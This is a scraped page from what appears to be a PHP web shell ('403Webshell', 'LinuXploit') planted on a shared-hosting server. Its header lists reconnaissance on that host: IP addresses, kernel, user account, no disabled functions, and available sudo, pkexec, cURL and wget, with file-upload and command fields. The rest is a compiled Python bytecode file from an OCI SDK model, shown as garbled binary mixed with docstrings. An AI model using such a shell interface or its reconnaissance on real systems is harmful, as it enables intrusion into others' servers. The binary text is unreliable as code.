403Webshell
Server IP : 162.144.4.212  /  Your IP : 216.73.216.108
Web Server : Apache
System : Linux gator2125.hostgator.com 5.14.0-162.23.1.9991722448259.nf.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 31 18:11:45 UTC 2024 x86_64
User : cozeellc ( 2980)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /lib/python3.9/site-packages/oci/devops/models/__pycache__/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /lib/python3.9/site-packages/oci/devops/models/__pycache__/diff_response.cpython-39.opt-1.pyc
a

���fc$�@s8ddlmZmZmZddlmZeGdd�de��ZdS)�)�formatted_flat_dict�
NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc@seZdZdZdd�Zedd��Zejdd��Zedd��Zejd	d��Zed
d��Z	e	jdd��Z	ed
d��Z
e
jdd��Z
edd��Zejdd��Zedd��Zejdd��Zedd��Z
e
jdd��Z
edd��Zejdd��Zdd�Zdd�Zd d!�Zd"S)#�DiffResponsez>
    Response object for obtaining list of changed files.
    c	Ksdddddddddd�|_ddd	d
ddd
dd�|_d|_d|_d|_d|_d|_d|_d|_d|_	dS)a�
        Initializes a new DiffResponse object with values from keyword arguments.
        The following keyword arguments are supported (corresponding to the getters/setters of this class):

        :param are_all_changes_included:
            The value to assign to the are_all_changes_included property of this DiffResponse.
        :type are_all_changes_included: bool

        :param change_type_count:
            The value to assign to the change_type_count property of this DiffResponse.
        :type change_type_count: dict(str, int)

        :param common_commit:
            The value to assign to the common_commit property of this DiffResponse.
        :type common_commit: str

        :param commits_ahead_count:
            The value to assign to the commits_ahead_count property of this DiffResponse.
        :type commits_ahead_count: int

        :param commits_behind_count:
            The value to assign to the commits_behind_count property of this DiffResponse.
        :type commits_behind_count: int

        :param added_lines_count:
            The value to assign to the added_lines_count property of this DiffResponse.
        :type added_lines_count: int

        :param deleted_lines_count:
            The value to assign to the deleted_lines_count property of this DiffResponse.
        :type deleted_lines_count: int

        :param changes:
            The value to assign to the changes property of this DiffResponse.
        :type changes: list[oci.devops.models.DiffResponseEntry]

        �boolzdict(str, int)�str�intzlist[DiffResponseEntry])�are_all_changes_included�change_type_count�
common_commit�commits_ahead_count�commits_behind_count�added_lines_count�deleted_lines_count�changesZareAllChangesIncludedZchangeTypeCountZcommonCommitZcommitsAheadCountZcommitsBehindCountZaddedLinesCountZdeletedLinesCountrN)
Z
swagger_typesZ
attribute_map�_are_all_changes_included�_change_type_count�_common_commit�_commits_ahead_count�_commits_behind_count�_added_lines_count�_deleted_lines_count�_changes)�self�kwargs�r�C/usr/lib/python3.9/site-packages/oci/devops/models/diff_response.py�__init__s4'��zDiffResponse.__init__cCs|jS)z�
        Gets the are_all_changes_included of this DiffResponse.
        Boolean value to indicate if all changes are included in the response.


        :return: The are_all_changes_included of this DiffResponse.
        :rtype: bool
        �r�rrrrr
Ws
z%DiffResponse.are_all_changes_includedcCs
||_dS)a

        Sets the are_all_changes_included of this DiffResponse.
        Boolean value to indicate if all changes are included in the response.


        :param are_all_changes_included: The are_all_changes_included of this DiffResponse.
        :type: bool
        Nr)rr
rrrr
cs
cCs|jS)z�
        Gets the change_type_count of this DiffResponse.
        Count of each type of change in difference.


        :return: The change_type_count of this DiffResponse.
        :rtype: dict(str, int)
        �rr rrrros
zDiffResponse.change_type_countcCs
||_dS)z�
        Sets the change_type_count of this DiffResponse.
        Count of each type of change in difference.


        :param change_type_count: The change_type_count of this DiffResponse.
        :type: dict(str, int)
        Nr!)rrrrrr{s
cCs|jS)z�
        Gets the common_commit of this DiffResponse.
        The ID of the common commit between source and target.


        :return: The common_commit of this DiffResponse.
        :rtype: str
        �rr rrrr�s
zDiffResponse.common_commitcCs
||_dS)z�
        Sets the common_commit of this DiffResponse.
        The ID of the common commit between source and target.


        :param common_commit: The common_commit of this DiffResponse.
        :type: str
        Nr")rrrrrr�s
cCs|jS)z�
        Gets the commits_ahead_count of this DiffResponse.
        The number of commits source is ahead of target by.


        :return: The commits_ahead_count of this DiffResponse.
        :rtype: int
        �rr rrrr
�s
z DiffResponse.commits_ahead_countcCs
||_dS)z�
        Sets the commits_ahead_count of this DiffResponse.
        The number of commits source is ahead of target by.


        :param commits_ahead_count: The commits_ahead_count of this DiffResponse.
        :type: int
        Nr#)rr
rrrr
�s
cCs|jS)z�
        Gets the commits_behind_count of this DiffResponse.
        The number of commits source is behind target by.


        :return: The commits_behind_count of this DiffResponse.
        :rtype: int
        �rr rrrr�s
z!DiffResponse.commits_behind_countcCs
||_dS)z�
        Sets the commits_behind_count of this DiffResponse.
        The number of commits source is behind target by.


        :param commits_behind_count: The commits_behind_count of this DiffResponse.
        :type: int
        Nr$)rrrrrr�s
cCs|jS)z�
        Gets the added_lines_count of this DiffResponse.
        The number of lines added in whole difference.


        :return: The added_lines_count of this DiffResponse.
        :rtype: int
        �rr rrrr�s
zDiffResponse.added_lines_countcCs
||_dS)z�
        Sets the added_lines_count of this DiffResponse.
        The number of lines added in whole difference.


        :param added_lines_count: The added_lines_count of this DiffResponse.
        :type: int
        Nr%)rrrrrr�s
cCs|jS)z�
        Gets the deleted_lines_count of this DiffResponse.
        The number of lines deleted in whole difference.


        :return: The deleted_lines_count of this DiffResponse.
        :rtype: int
        �rr rrrr�s
z DiffResponse.deleted_lines_countcCs
||_dS)z�
        Sets the deleted_lines_count of this DiffResponse.
        The number of lines deleted in whole difference.


        :param deleted_lines_count: The deleted_lines_count of this DiffResponse.
        :type: int
        Nr&)rrrrrr�s
cCs|jS)z�
        **[Required]** Gets the changes of this DiffResponse.
        List of changes in the difference.


        :return: The changes of this DiffResponse.
        :rtype: list[oci.devops.models.DiffResponseEntry]
        �rr rrrr�s
zDiffResponse.changescCs
||_dS)z�
        Sets the changes of this DiffResponse.
        List of changes in the difference.


        :param changes: The changes of this DiffResponse.
        :type: list[oci.devops.models.DiffResponseEntry]
        Nr')rrrrrrs
cCst|�S�N)rr rrr�__repr__szDiffResponse.__repr__cCs|durdS|j|jkS)NF)�__dict__�r�otherrrr�__eq__szDiffResponse.__eq__cCs
||kSr(rr+rrr�__ne__ szDiffResponse.__ne__N)�__name__�
__module__�__qualname__�__doc__r�propertyr
�setterrrr
rrrrr)r-r.rrrrrsJE















rN)Zoci.utilrrrZoci.decoratorsr�objectrrrrr�<module>s

Youez - 2016 - github.com/yon3zu
LinuXploit